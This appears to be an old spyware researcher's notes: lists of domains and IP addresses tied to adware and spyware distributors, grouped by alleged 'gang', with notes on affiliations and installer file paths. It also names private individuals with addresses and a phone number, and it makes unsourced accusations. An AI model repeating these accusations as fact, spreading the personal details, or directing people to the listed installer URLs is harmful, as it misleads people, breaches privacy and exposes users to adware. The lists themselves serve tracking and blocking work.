database last updated on 2-jul-2003 23:07:18 edt.
domain servers in listed order:
ns1.disk11.com  207.246.105.6
ns2.disk11.com  207.246.105.7

*******************************
207.246.124.10	vx2.cc
207.246.124.101	ads.vx2.cc
207.246.124.105	207.246.124.105/cabs/roosttd3001
207.246.124.105	download.vx2.cc
207.246.124.113	checkin.clickalchemy.com
207.246.124.113	ctl.twain-tech.com
207.246.124.113	master.mx-targeting.com
207.246.124.113	pp.multimpp.com
207.246.124.113	transctl.vx2.cc
207.246.124.113	xadsj.offeroptimizer.com
207.246.124.116	cliks.org
207.246.124.116	conscorr.com
207.246.124.116	farmmext.com
207.246.124.116	localnrd.com has old ip
207.246.124.116	multimpp.com has old ip
207.246.124.116	offeroptimizer.com
207.246.124.120	xads.offeroptimizer.com
207.246.124.120	xadso.offeroptimizer.com
207.246.124.130	mail.tps108.org
207.246.124.132	sputnik.vx2.cc
207.246.124.145	searchrabbit.com
207.246.124.61	z1.vx2.cc
207.246.124.90	internal.vx2.cc
207.246.124.94	download-dev.abetterinternet.com
216.110.36.129	ipinsight.net
216.110.36.129	mypctuneup.com
216.187.118.218	optinemailservices.com
216.187.118.221	hostpool.net
216.254.144.15	bc777.com
216.254.144.15	n69.com
216.254.144.41	digitalrooster.com
216.254.144.41	webdream.com
216.93.179.220	flashtalk.com


transponder gangs affiliates and partners



*****************************************
transponder gangs affiliates and partners
*****************************************
shopnav (direct partner in that from abetterinternet.com files server
67.18.123.195	 67.18.123.195/icon/
198.65.114.248	0202search.com
198.65.114.248	2020sarch.com
198.65.114.248	2020search.com
198.65.114.248	20-20search.com
198.65.114.248	2020srch.com 
198.65.114.248	220search.com
198.65.114.250	search.drsnsrch.com
67.18.123.195	67.18.123.195/icon
67.18.108.136	badurl.grandstreetinteractive.com
67.18.124.140	compare.drsnsrch.com
67.19.15.195	dlkw.drsnsrch.com
67.18.124.140	drsnsrch.com
67.18.124.147	404.grandstreetinteractive.com
67.18.124.179	kw.drsnsrch.com
67.19.15.187	post.drsnsrch.com
67.18.124.195	ron.drsnsrch.com
198.65.114.250	search.drsnsrch.com
67.18.123.162	shopnav.com
198.65.114.248	snsrch.com 
198.65.114.248	snsrch.net 
198.65.114.248	snsrch.org 
67.19.15.151	toolbar.drsnsrch.com
216.21.229.240	walnut-ventures.com
67.18.124.139	websearch.drsnsrch.com
67.18.124.139	websearch.drsnsrch.com
67.18.124.204	welcome.drsnsrch.com

198.65.114.250 search.drsnsrch.com has xads.offeroptimizer.com in its code

badurl.grandstreetinteractive.com leads to search.drsnsrch.com and search.drsnsrch.com 
has xads.offeroptimizer.com in its code
mike thompson
250 montgomery street
san francisco, ca 94104 us

wupdt.exe and systb.dll from sysupdate.grandstreetinteractive.com


********************************
kmgi corp.
69.10.136.142 kmgi.com (abetterinternet.com uses eliminate spam software of theirs)
209.68.41.79 eliminatespam.com
209.197.70.143 popupbuster.net

**************

powweb.com:66.152.97.130 
(webhosting advertises directly thru offeroptimizer) 
foobar.com:66.152.98.18
(powweb owns foobar and the free mahjonng game that installs 
the transponders when downloaded from abetterinternet.com)

ipowerweb.com:216.69.226.50 (webhositng)
**
wincognito.com:69.2.200.232
**
flashtalk.com:216.93.179.220
**

************************************************
scam ads - direct clients of offeroptimizer.com
************************************************
yourdvdplayer.com:208.48.182.44
expertsavings.com:208.48.182.44
**
first tennessee national corporation
marketing & strategy 
fhel.com:208.223.181.200
firsthorizon.com:208.223.181.200

****
mygeek.com (offeroptimizer an affiliate for their keywords advertising)


12.47.196.48 
12.47.196.48 adondirect.com 
12.47.196.48 adonnetwork.com 
12.47.196.48 adontext.com 
12.47.196.48 expandsearch.com 
12.47.196.48 featurednetwork.com 
12.47.196.48 featuredsitenetwork.com 
12.47.196.48 featuredsitesnetwork.com 
12.47.196.48 mygeek.com 
12.47.196.48 mygeek.net 
12.47.196.48 mygeekdirect.com 
12.47.196.48 mygeekpro.com 
12.47.196.48 mygeeksearch.com 



12.47.196.49 searchcentrix.com
12.47.196.49 search-o-matic2000.com
216.133.67.109 downloads.searchcentrix.com:

**************************************************
free astrology reading scam - transponder install
**************************************************

66.28.193.41 phoenixgrp.com (marketing type front)
the phoenixgrp.com has a backdoor link to a darker side that contains porn pics from a 
sadoslaves site.
66.28.193.28 wasteland.com (there porn site)

66.28.193.30 sssh.com (womens porn magazines)
66.28.193.52 rowntreephotography.com 
(trying to look like a highclass operation)
66.28.193.55 idivination.com
66.28.193.55 spanking-epics.com
66.28.193.55 spankingepics.com

66.28.193.40 magickalneeds.com (store for magik, witchcraft, occult, etc.)
66.28.193.40 magicalneeds.com

66.28.193.42 rowntree.net 
(claims its a family photo album)
66.28.193.53 cosmicvillage.com
this is the eula from the popup install screen:
cosmicvillage.com/beta/privacy.html

cosmicvillage.com/love/lovemenu.html 
(this is the backdoor to bypass the install and trnsmission of personal information)

"welcome to cosmicvillage .com

cosmicvillage is for entertainment purposes only, and is not to be used in place of 
professional services such as counselors, therapists, doctors or lawyers. we are also 
committed to protecting your privacy. any information you provide us will be kept 
strictly confidential. our goal is to preserve your privacy at all times."

it never states it will install a transponder variant -thus this can be thought of a 
spyware installations.
cosmicvillage.com/love/ this is the form you fill out and submit.

**********************
traffix gang sites 
**********************
(partner and affiliates of offeroptimizer/abetterinternet)
64.5.217.241 aavalue.com
64.5.217.241 atlasautomotivegroup.com
64.5.217.241 atlascreditgroup.com
64.5.217.241 atlasincomebuilder.com
64.5.217.241 eztracks.aavalue.com ads install ez-tracks.exe (added 7/14/2004)
64.5.217.70 ez-tracks.com (added 7/14/2004)
64.5.217.223 clearflow.com
dataoffers.com 64.5.201.170
entertainmentrewards.com 64.5.230.188
groupconfirm.com 64.5.201.208 (traffix autoresponder system)
64.5.217.241 grouplotto.com 
64.5.217.223 infiknowledge.com
infinames.com (no ip)
64.5.217.76 jewelclaimcenter.com 
64.5.217.53 pickoftheweb.com installs whenu.com clocksysn
64.5.217.241 prizeamerica.com 
64.5.230.150 prizecade.com 
63.250.32.194 quintel.com 
66.207.98.158 traffix.com
216.73.123.224 mail.sixplexicparcel.com (spam email)
216.73.123.224 mail.infoinsitesparcel.com
64.151.87.53 hjkl.infoinsitesparcel.com (spam email)
64.151.87.53 biplexic.com  (spam email)  
64.151.87.53 biplexicmail.com (spam email) 
64.151.87.53 youremailreply.com (spam email)
supernamehosts.com (no ip but still owned by traffix)
64.5.217.241 takeoneentertainment.com 
128.242.83.52 thanksmuch.com 
64.5.217.241  thebargainspot.com
64.5.217.231 imatchup.com 
64.5.217.151 hotmatchup.com 
69.20.67.86   livesupportonthenet.com (works with clickhelp.net)

64.78.193.7  curbyourcravings.com 
xadsq.offeroptimizer.com transmits the data to their partner sohodigital.net

po box 87  bellmore, new york 11710

spam partners
38.117.226.103 superpromotionstation.com 
38.117.226.103 hureo.com spam to register with group lotto prisedistributors
38.117.226.103 herwa.com 
38.117.226.103 icrsn.com 
38.117.226.103 ydrb.com
38.117.226.103 ygqy.com
38.117.226.103 ztsy.com

***************************

mindset interactive/addictivetechnologies

207.182.241.238 1000funnyvideos.com
207.182.241.238 at-funnyvideos.com 
207.182.241.238 at-screensavers.com 
207.182.241.238 addictiveplay.com
(addictiveplay.com goes to skilljam.com:12.129.204.208 owned by euniverse)
207.182.241.238 at-offers.com
skinnable interface 
programmable countdown timer 
programmable alarm 
access to hundreds of games 
adware supported 

66.98.229.16 at-games.com
66.98.229.16 netpalgames.com


at-talk.com (not yet started as of 5/26/2004)
207.182.241.228 f1organizer.com 207.182.241.228 
207.182.241.228 f1organizer.net:
207.182.241.228 favorites1.com
207.182.241.228 favorites1.net

207.182.237.210 100topdownloads.net
207.182.237.210 addictivetechnologies.com
207.182.237.210 broadspring.com
207.182.237.210 freebiesareus.com
207.182.237.210 freebiesrus.com
207.182.237.210 giantfreebies.net
207.182.237.210 mindseti.com 
207.182.237.210 mindsetinteractive.com
207.182.237.210 myprizes.net
207.182.237.210 netpalnow.com
207.182.237.210 vistainteractivemedia.com 
207.182.237.210 vistainteractivemedia.net
64.202.167.192 netpaloffers.net: (now parked)


mindset interactive/addictivetechnologies and transponder gang partners

66.220.2.164 topmoxie.com (creator of mo money)
64.62.182.4 topmoxie.com
sysupdates.com:66.220.2.164 (mo money controling 
server)
63.236.57.90 e-bates.com
63.236.57.90 ebates.com 
63.236.57.90 ebates.biz
63.236.57.90 ebates.info
63.236.57.90 ebates.net
63.236.57.90 erebates.com
63.236.57.90 dealsters.com
63.236.57.90 dealsters.net 
63.236.57.90 dealsters.org 
63.236.57.90 bonussavingscenter.com
216.168.224.63 erebates.org
216.168.224.63 erebates.us
216.168.224.63 dealsters.biz
216.168.224.63 dealsters.us
content.ebates.com:208.184.39.152


navexcel.com 128.121.212.181

***************** 

free-windows-games.com:67.18.119.91 
(installs adware for free games)
free-windows-games.com/privacy.html

the favoriteman im64.dll code shows direct affiliations 

gamehouse.com:216.127.40.150
(netpal shows gamehouse.com is a direct partner affiliate)
folder=at-games
link=gamehouse.com/affiliates/template.jsp?aid=2226
name=gamehouse games

flyordie.com:128.121.241.246 
(netpal affiliate and direct partner)
[addf3]
folder=at-games
link=regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7834
name=flyordie games

incredifind.com:12.129.205.105 of euniverse (see euniverse section below)
regnow.com:208.197.4.115 (digitalriver.com - main affiliate program)

bigfishgames.com:63.251.10.166
(netpal affiliate and direct partner)
[addf2]
folder=at-games
link=regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7551
name=big fish games

paul thelen, big fish games founder and ceo, has an mba from stanford university and a 
bs 
in ee/cs from university of washington. paul also has over 12 years experience working 
in 
high tech, most recently at realnetworks.

213.188.129.72 cheatextreme.com

67.18.195.243 jenniferlopez.net
64.14.40.138 searchalot.com
*********
tronix software, inc. 
1220 n. market street suite 606
wilmington, de 19801
216.74.138.137 advancedsearchbar.com
216.74.182.105 downloadlab.com
******************
euniverse sites
(also installed with addictivetechnologies netapl)
ad-logics.com:12.129.204.65
ads.euniverseads.com:12.129.204.160
crazymates.com:12.129.204.46
cupidjunction.com:66.48.37.81
dietingplans.com:12.129.205.162
ecommercetransactionsllc.com:12.129.204.99
euniverse.com:12.129.204.158
euniverseads.com:216.35.114.145
expage.com:12.129.204.15
femaleadvantage.com:12.129.204.47
flowgo.com:12.129.204.125
gamecity.net: 12.129.204.107
gamerival.com:12.129.204.107
increaseyourhealth.com:12.129.204.183
incredifind.com:12.129.205.105
keenvalue.com:12.129.205.171
mycoolscreen.com:12.129.204.219
myfunstart.com:12.129.205.206
partner2profit.com:12.129.204.122
popups.ad-logics.com:12.129.205.120
sirsearch.com:12.129.205.102 (toolbar uses keenvalue.com)
skilljam.com:12.129.204.208
thunderdownloads.com:12.129.204.204
update.thunderdownloads.com:12.129.205.220

12.129.204.107
eunigames.com 
gamecity.net 
gamerival.com 
gamersblast.com 
gamingblast.com 
hergameroom.com 

euniverse 3rd party bundled partners
igetnet.com:216.177.73.135
n-case.com:216.74.27.20

*****************
206.161.120.99
206.161.120.99  275megs.com 
206.161.120.99  aimforums.com 
206.161.120.99  aimgraphics.com 
206.161.120.99  aimphuck.com 
206.161.120.99  gamescum.com 
206.161.120.99  imbum.com 
206.161.120.99  imbum.net 
206.161.120.99  imbum.org. 
206.161.120.99  joketrade.com 
206.161.120.99  megaiconsite.com 
206.161.120.99  sumopimp.com 
206.161.120.99  viralgizmo.com 

optinrealbig – scott richter gang 
aimphuck.com: 206.161.120.99 installs bundleware nictech networks
allchickswithdicks.com:69.6.21.11
analslammers.com: 64.202.167.129
auctionsnap.com: 69.6.21.32
auctionwhiz.com: 69.6.21.18
69.6.27.6 bashapop.com: 69.6.21.18 bashapop popup killer
bluerocketonline.com:69.6.16.15
c4c01.com: 66.179.100.178
cash4creatives.com:69.6.21.229 redirects to hugermelons.com
cpaempire.com: 69.6.21.177
cuterteen.com :69.6.21.11
dfmmb.com (no active ip but belongs to optinrealbig.com llc)
dogeinstein.com :69.6.21.18
eatmypussyright.com: 69.6.21.11
easycream.com 69.6.21.18
funamateur.com: 69.6.21.11
geekpost.com 
greatcarrates.com (cpaempire.com) 
hugermelons.com: 69.6.21.11
imbum.com: 206.161.120.99 installs netpaloffers imbum.cab/imbum.exe
joketrade.com: 206.161.120.99 netpaloffers imbum.cab/imbum.exe
jayswebservice.com :69.6.21.60
moosq.com :69.6.21.18 re-directs to ss01.net on submit to unsubscribe
mysteryoftarot.com (4/1/2004) 
netfuncards.com: 66.238.181.67
pillsofpleasure.com 69.6.21.18
realbigcash.com: 69.6.21.18 adult affiliate program signup site.
realbighosting.com: 69.6.21.18 godaddy affiliate which re-directs to secureserver.net
realcheapgifts.com: 69.6.21.18 selling laser gunrealgreatgifts.com 
redhotwonders.com :69.6.21.11 (porn) under 18 link: imbum.com
saverealbigdeals.com:69.6.21.50
smallnsexy.com:69.6.21.11
ss01.net: 69.6.21.191
tekmailer.com:69.6.6.252 unsubscribe page
tomuchdick.com 69.6.21.11
whackapop.com:69.6.21.18 bashapop popup killer
youngerasian.com:69.6.21.11


trekdata gang 

spicycomet.com (no ip) 
38.118.144.138 warplist.com (listwarp)
38.118.144.180 advancedsoftwaresupport.com
38.118.144.180 blazinglogic.com
38.118.144.180 errornuker.com
38.118.144.180 forums.trekblue.com (forum for spywarenuker)
38.118.144.180 no-pops.com
38.118.144.180 no-pops.net
38.118.144.180 pcorion.com
38.118.144.180 spamnuker.com
38.118.144.180 spyhear.com
38.118.144.180 trekblue.com
38.118.144.180 trekdata.com
38.118.144.180 trekeight.com
38.118.144.180 trek8.com
38.118.144.180 1ad2srvr-cpt-v1.com
38.118.144.180 1vresnaimodsdrawkcab.com
38.118.144.180 24-7-365adsrv.com
38.118.144.180 advancedsoftwaresupport.com
38.118.144.180 bubblycastle.com
38.118.144.180 christinealt.com
38.118.144.180 clickeight.com
38.118.144.180 dategizmo.com
38.118.144.180 dategizmo.net
38.118.144.180 datesgizmo.com
38.118.144.180 datinggizmo.com
38.118.144.180 datinggizmo.net
38.118.144.180 datingizmo.com
38.118.144.180 datingizmo.net
38.118.144.180 errornuker.com
38.118.144.180 evidencenuker.com
38.118.144.180 hackernuker.com
38.118.144.180 jl29jd25sm24mc29.com
38.118.144.180 mc29rys1.com
38.118.144.180 phonebilleliminator.com
38.118.144.180 phonebillnuker.com
38.118.144.180 recipe-network.com
38.118.144.180 ryadsdelivserv.com
38.118.144.180 sailhousepublishing.com send email only
38.118.144.180 spycide.com
38.118.144.180 spyhear.com
38.118.144.180 spyhear.net
38.118.144.180 spyraid.com
38.118.144.180 srv2cpt.com
38.118.144.180 ta26lita.com (trekeight llc)
38.118.144.180 thomasdover.com incorporating agent for trekdata gang
38.118.144.180 trek8games.com (trek eight llc)
38.118.144.180 txetmodnar.com
38.118.144.182 popup-nuker.com: (trekeight llc)
38.118.144.183 nopop.net (trekeight llc)
38.118.144.183 nopop.biz (trekeight llc)
38.118.144.183 nopops.org (trekeight llc)
38.118.144.184 wayweird.com  (trekeight llc)
38.118.144.185 nuker.com  (jamie leasure)
38.118.144.185 spywarenuker.com  (jamie leasure)
38.118.144.185 naughtynuker.com  (trekeight llc)
   
63.84.174.254 i5interactive.com
66.98.248.9 em5000.com 
(all material and trademarks are copyright 2004 by warplist, inc.)

66.98.130.46 topeleven.net (adware by exactadvertising.com:64.21.81.204)

66.98.130.46 adaaware.com 
66.98.130.46 adawae.com 
66.98.130.46 adawair.com 
66.98.130.46 adsware.com 
66.98.130.46 bluehavenmedia.com 
66.98.130.46 cursorgizmo.com 
66.98.130.46 porn-gizmo.com 
66.98.130.46 softwareds.com 
66.98.130.46 topeleven.net (adware by exactadvertising.com:64.21.81.204)

**
66.117.8.10 download.gigatechsoftware.com
66.117.8.38 gigatechsoftware.com
66.117.8.38 greasycow.com
66.117.8.38 greasycow.net
207.44.198.26 crazydrinks.com
207.44.198.26 netsource101.com
207.44.198.26 twistedhumor.com (adware - adsincontext.com:209.164.0.10)
207.44.198.26 sexebits.com(porn)
207.44.198.26 rankyou.com
207.44.198.26 gamesource101.com
209.234.155.99 lionsprideenterprises.com
216.21.229.209 leadgreed.com
216.21.229.209 adgoblin.com was: 38.118.144.187

trekdata partners or they own it..
66.98.242.12 hitjokes.com
69.51.8.39 myaffiliateprogram.com (for spyhear)
69.51.8.7 kowabunga.net
kowabunga technologies, llc
todd@kowabunga.net
962 newburgh
westland, mi 48185 us 
+1.7344500728

trekdata affiliates:
aksoftware.com (lists spywarenuker and noadware affiliates)
roar.com
spy-ware-nuker.com
**********************

lop.com gang (england and florida)
active-max.com: 66.220.17.70
allaboutsearching.com:66.220.17.200
ao.lop.com:66.220.17.151
chaostic.com: 205.252.89.53
crap2.com 216.194.89.113 (porn affiliate program)
cybergirlsex.com: 66.220.17.37 (fl internet marketing jason lucas)
ecpm.com: 66.220.17.204
find-quick.com: 66.220.17.206
hadassahyouth.com (no active ip but owned by alex shamash with spawnet.com dns)
lop.com: 66.220.17.153
maxexp.com 66.220.17.39
maximumexperience.com: 66.220.17.39 (fl internet marketing)
mp3heaven.org 66.220.17.35
mp3search.com: 209.50.253.157 (directs to lop.com for uninstall)
mp3sound.com: 209.50.253.158 (spawnet limited)
msgplus.net:66.220.17.175 
msgpluszone.com:66.98.252.17 (support forum for msgplus)
patchou.com:66.98.198.21 (creator of msgplus)
mysearchnow.com: 66.220.17.211
ohyea.org: 66.220.17.213 (media live)
searchwebnow.com: 66.220.17.211
spawnet.com 216.194.67.59
trinityacquisitions.com: 66.220.17.74 (trinity acquisitions inc. jason lucas)
warnet.com: 63.218.224.50 (sells warnet free edition adware detection and removal)
wrn.net 216.194.89.114 (non-porn affiliate program)
xcx.com: 208.231.27.100 (spawnet limited) 2001 had cracks and porn

lop.com standard redirects and home page for hijacking
aavc.com 66.220.17.152
acjp.com 66.220.17.152
ebdv.com 66.220.17.152
ebdw.com 66.220.17.152
ebjp.com 66.220.17.152
ebkn.com 66.220.17.152
ebky.com 66.220.17.152
eblv.com 66.220.17.152
wbkb.com 66.220.17.152
ebvr.com 66.220.17.152
ecmh.com 66.220.17.152
ecwz.com 66.220.17.152
ecyb.com 66.220.17.152
eduy.com 66.220.17.152
eeev.com 66.220.17.152
farse.com 66.220.17.39
ibmx.com 66.220.17.152
icwb.com 66.220.17.152
icwo.com 66.220.17.152
icwp.com 66.220.17.152
iddh.com 66.220.17.152
idhh.com 66.220.17.152
ifiz.com 66.220.17.152
iguu.com 66.220.17.152
samz.com 66.220.17.152
saoe.com 66.220.17.218
sbee.com 66.220.17.38
sbjr.com 66.220.17.219
sbnl.com 66.220.17.220
sbnt.com 66.220.17.221
sbvr.com 66.220.17.222
sckr.com 66.220.17.223
scrk.com 66.220.17.224
sdry.com (now owned by ultimate search 66.216.74.57)
seld.com (now owned by ultimate search 66.216.74.57)
sfux.com 66.220.17.228
sheat.com 66.220.17.39
srox.com (now owned by ultimate search 66.216.74.57)
srsf.com (now owned by ultimate search 66.216.74.57)
ssby.com (now owned by ultimate search 66.216.74.57)
surj.com (now owned by ultimate search 66.216.74.57)
tdak.com 66.220.17.229
tdmy.com 66.220.17.231
tefs.com 66.220.17.232
tfil.com 66.220.17.233
tjar.com 66.220.17.235
tjaw.com 66.220.17.236
tjgo.com 66.220.17.239
tjem.com 66.220.17.238
torc.com 66.220.17.152
wabu.com 66.220.17.152
wabq.com 66.220.17.152
wfix.com 66.220.17.240
wflu.com 66.220.17.241


bulletproofsoft (bps gang)

activex.us - (domains by proxy, inc.) 216.40.206.208
adnuker.com - (domains by proxy, inc.) 207.44.200.48
ads4me.net - (domains by proxy, inc.) 207.44.200.48
audioshareware.com - (h4host.com) 216.40.206.208
audiotools.ws - (h4host.com) 216.40.206.208
bulletproofsoft.com - (domains by proxy, inc.) 216.40.227.156
bulletproofsoft.info:66.98.154.33
bulletproofsoft.ws:66.98.154.33
clicknzip.com - (domains by proxy, inc.) 207.44.200.48
downloadupload.com - (h4host.com) 216.40.206.208
esftp.com - (domains by proxy, inc.) 216.40.206.208
file4me.com -(elbanhawy investments now h4host.com) 216.40.206.208
filehog.com – (h4host.com) 207.44.200.48
fireballftp.com -(elbanhawy investments now domains by proxy, inc.) 216.40.206.208
ftpking.com -(elbanhawy investments now domains by proxy, inc.) 216.40.206.208
ftpmonster.com -(elbanhawy investments now domains by proxy, inc.) 216.40.206.208
ftpright.net - (domains by proxy, inc.) 216.40.206.208
getridspyware.com: (h4host.com 66.98.154.33
h4host.com - (domains by proxy, inc.) 216.40.227.9
imagineer-web.com 216.40.227.154
job4middleeast.com -
(boston executive limousine now domains by proxy, inc.) 216.40.206.208
jobbid.ws - (h4host.com) 216.40.206.208
jobbid4me.com -(boston executive limousine now domains by proxy, inc.) 216.40.206.208
mawaqit.com 216.40.227.9
mediatools.ws - (h4host.com) 216.40.206.208
monsterzip.com - (domains by proxy, inc.) 216.40.206.208 
noadware.com: - (domains by proxy, inc.) 66.98.154.33
bulletproofsoft.info:66.98.154.33
bulletproofsoft.ws:66.98.154.33
onestopsoft.com - (domains by proxy, inc.) 216.40.206.208
popupshield.net -(domains by proxy, inc.) 216.40.206.208
popupsnuker.com: (godaddy) 216.40.206.172 (installs ebates and navecel)
robust.ws - (h4host.com) 216.40.206.208
robustftp.com - (domains by proxy, inc.) 216.40.206.208
royalftp.com - (domains by proxy, inc.) 216.40.206.208
sharewaredepo.com - (h4host.com) 216.40.206.208
sharewarepile.com - (h4host.com) 216.40.206.208
softdepo.com - (h4host.com) 216.40.206.208
softwareclub.ws - (domains by proxy, inc.) 216.40.206.208
softwaredepo.com - (h4host.com) 216.40.206.208
softwarepile.com - (domains by proxy, inc.) 216.40.206.208
soundindepth.com – (domains by proxy) 216.40.206.208
spaminnihilator.com – (domains by proxy) 216.40.206.208
spamnullifier.com - (domains by proxy, inc) 216.40.206.208
spywarezapper.com (domains by proxy, inc) 66.98.154.33
spider.ws - (chia lor) 216.40.206.208
tbel.net - (boston executive limousine) 216.40.206.208
traceremover.com - (elbanhawy investments) 216.40.206.208
tracezapper.com - (elbanhawy investments) 216.40.206.208
trackscrubber.com - (elbanhawy investments) 216.40.206.208
trackzapper.com - (elbanhawy investments) 216.40.206.208
windowscleanser.com - (domains by proxy, inc.) 216.40.206.208
windowsclenser.com - (h4host.com) 216.40.206.208
zillaftp.com - (domains by proxy, inc.) 216.40.206.208
zillasoft.ws - (h4host.com) 216.40.206.208

cloned download sites linked to the bps
digitalriver.com 209.87.182.60 
regsoft.net:208.248.77.64
regnow.com:208.197.4.115 (this is used by netpaloffers)
topdownloads.com 209.87.178.244
tdwebhost.com 64.246.54.50
pigeons-news.com 64.246.54.50
convertdvd.info:64.246.54.50
van-opstal.com:64.246.54.50

s.org:64.246.54.50
uploadnet.com 64.246.54.50
startpage2000.com:64.246.54.50
spycleaner.net:64.246.54.50 
realclicks.com:207.44.194.97
freeware.cc:207.44.194.97
freeware2000.com:207.44.194.97
herder.net 64.45.60.40 (herder, j.n, jorrit)
enova.nl 62.148.166.3 
topdownloads.net:66.98.178.22
topdownloadsnetworks.com 66.98.178.22
pigeons.net:66.98.178.22
subloads.com:66.98.178.22
downloadsnet.com:66.98.178.22
supportmail.info:216.168.224.63
rizalsoftware.com:207.44.194.97
backupdvd.info:207.44.194.97



cyberheat (bps partner or rebranded cloneware/porn peddler:


216.158.128.20 primenetwork.net
216.158.129.212 discountrealitysites.com
216.158.129.212 euroteensxxx.com
216.158.129.212 hisfirstgaysex.com
216.158.129.249 topcash.com
216.158.129.251 topbucks.com
216.158.129.76 adultcams.com
216.158.129.76 gaymaturexxx.com 
216.158.129.76 how2enlargepenis.com
216.158.129.76 how2pickupgirls.com
216.158.129.76 how2pleaseher.com
216.158.129.76 sporterotica.com
216.158.129.76 upayperview.com
216.158.129.77 cyberheatinc.com
216.158.129.77 iblockpopups.com 
216.158.129.77 internetquicksearch.com 
216.158.129.77 internetquicksearch.net 
216.158.129.77 iquicksearch.com 
216.158.129.77 iquicksearch.net 
216.158.129.77 mysearchhome.com 
216.158.129.77 searchbuckz.com 
216.158.129.77 seekio.com 
216.158.129.77 sureseeker.com 


216.158.129.78 adwareremovergold.com
216.158.129.78 bestmovies.com
216.158.129.78 cartoon69.com
216.158.129.78 datashreddergold.com
216.158.129.78 emailspamblock.com
216.158.129.78 emailspamblock.com
216.158.129.78 evidencecleanergold.com
216.158.129.78 freehotpics.com
216.158.129.78 girlsgetcrazy.com
216.158.129.78 interracialjoy.com
216.158.129.78 modemspeedbooster.com
216.158.129.78 pcspeedbooster.com
216.158.129.78 surfersuitesoftware.com 
1 adwareremovergold.com 
2 allgangbang.com 
3 blackcockswhiteslut.com 
4 blackcockswhitesluts.com 
5 blackcockwhitesluts.com 
6 cartoon69.com 
7 cdtomp3files.com 
8 centerfoldsweb.com 
9 cheerchix.com 
10 clivesex.com 
11 cyberfoldsweb.com 
12 datashreddergold.com 
13 dvdcopyeasy.com 
14 ebonyjoy.com 
15 emailspamblock.com 
16 evidencecleanergold.com 
17 evidenceerasergold.com 
18 extractorandburner.com 
19 facialmag.com 
20 gayamateurxxx.com 
21 gayasianxxx.com 
22 gayfacialsxxx.com 
23 gayinterracialxxx.com 
24 gaymilitaryxxx.com 
25 gayvideosxxx.com 
26 gayvoyeurxxx.com 
27 girlsgetcrazy.com 
28 herfirstbigcock.com 
29 hirsutebeavers.com 
30 hisfirstbigcocks.com 
31 hisfirstfacial.com 
32 hisfirstfacials.com 
33 hisfirsthugecock.com 
34 hisfirsthugecocks.com 
35 hugerealboobs.com 
36 indiachix.com 
37 interracialjoy.com 
38 lesboerotica.com 
39 members-access.com 
40 milfseeker.com 
41 modemspeedbooster.com 
42 mp3filestocd.com 
43 mysextour.com 
44 mysextours.com 
45 ohboys.com 
46 oursextour.com 
47 oursextours.com 
48 pcspeedbooster.com 
49 pornoground.com 
50 pornstudhunter.com 
 pornstudsearch.com 
52 successwithgirls.com 
53 surfersuitesoftware.com 
54 tittymax.com 
55 touristseeker.com 
56 trannyhouse.com 


nictech networks/ vx2.betterinternet - look2me

101h.com:216.219.239.247 
nictechnetworks.com:207.36.117.38

69.20.20.161 a-d-w-a-r-e.com 
69.20.20.161 ad-w-a-r-e.com
69.20.20.161 desktopvillage.com 
69.20.20.161 kickbackspam.com
69.20.20.161 look2me.com
69.20.20.161 look2me1.com 
69.20.20.161 look2me2.com 
69.20.20.161 look2me4.com

69.20.20.162 bundleware.com: (produces the software bundle installers)
69.20.20.164 zestyfind.com (new addition: used in the hijacking)
69.20.20.165 admedian.com:
207.36.117.38 flashmyass.com
207.36.117.38 greekorgeek.com
207.36.117.38 hotteststudents.com
207.36.117.38 similarsingles.com(date and rate porn)
207.36.117.38 spotonnews.com (desktop news that really isn’t)
207.36.117.38 studylater.com
207.36.117.38 thindivide.com (p2p file sharing)
207.36.117.38 thirdeyecon.com
(affiliated with nictech networks)
rdestiny llc
zerotrace.com 
205.206.208.224  cutteststudents.com (now owned by popularenterprises llc)


ad shooter
adshooter.com - this looks to be the server that the installation files come from.
adshooter.com resolves to 66.115.182.10
marketingx.com this is tjheir marketing site
customersupporthelp.com
platinumbucks.com this is the porn affiliate program site


aim icon buddy sites

aimcrap.com 
also opens psychics4free.com 216.130.197.250 (globalmediaresources.com 216.130.196.84)
aimdolls.com:216.127.88.38 (addictivetechnologies)
aimking.com 69.93.59.122
aimphuck.com 206.161.120.99 (bundleware owned: optinrealbig.com
aimtop100.com:216.117.148.79 various rotational adware
animeiconz.com
buddyicon.info:66.230.132.19
buddydepot.com 207.44.236.27
celebbuddy.com
crazynetworking.com
creative-effort.com (possible ad server)
desktopcity.com 69.6.2.164 owned: optinrealbig.com 
  66.98.158.30 (wildmedia)
dollfreak.com 67.15.36.16
dollrock.com 63.99.224.77 (wildmedia)
dollsnow.com 67.15.16.17 ()/(roings.com) (mediacharger.com)
dollspot.com 66.98.158.30 (at-games) also opens desktopcity.com 
dollzbuddy.com 207.44.236.27 
fuckedbuddy.com 207.44.236.27 (wildmedia)
icondude.com:66.98.158.30 (mediaticketsinstaller - purityscan)
iconfun.com 67.15.16.17 (wildmedia) /(roings.com)
iconkid.com 66.98.158.30 (media-motor)
iconshack.com 66.98.182.92 (part of aimcrap.com)
imbum.com 206.161.120.99 (netpaloffers and bundleware) owned: optinrealbig.com
jensicons.com:207.44.136.24 (at-games) beatty, jennifer/john
joketrade.com 206.161.120.99 (netpaloffers) owned: optinrealbig.com
mvtracker.com:64.246.11.147
monkeydoo.com 66.98.158.30 
originalicons.com:207.44.130.128 (at-games) beatty, jennifer/john
punkaim.com 63.247.65.234 (at-games.com)
rockbuddy.com 207.44.236.27
teen-hangout.com:217.206.204.68
todayspoker.com 66.98.158.30

tonsofdolls.com:66.194.238.61 
(flingstone.com/cab/2000xp/cdtinc/bridge-c20.cab advertised as buddy icon maker)

totaldollz.com 67.15.36.16
wizteen.com 66.98.158.30
xflashgames.com 66.98.158.30

screen savers /wallpaper 
music/game/smilies sites
letssingit.com
lyricsplanet.com
123greetings.com 

123india.santabanta.com
web-nexus.net/eula.php
123greetings.com 
absolutelyric.com 
altogames.com
artistdesktopthemes.com:207.44.195.112
altoentertainment.com
colonize.com 
dailymp3.com
fancube.com
freeze.com
g-sistah.com 
lyricsmansion.com
pathison.com
playminigolf.com
plyrics.com
screensaver.com  
tabpower.com 
wallpapers4u.com
x-wallpapers.com (xxxtoolbar.com)
fabuloussavers.com
206.67.50.99 screensaverheaven.com calls:galttech.com:208.249.124.247
screensaverheaven.com/galt/setupbikini8wh.exe
has optin installs ebates. uncheck it an no install

galtdesk.com/galt/candyphotos.exe installs: ezula

screensaverheaven.com/galt/valentine_eu.exe
mysearchbar.com focus interactive inc
**
1001celebrities.com
ezthemes.com
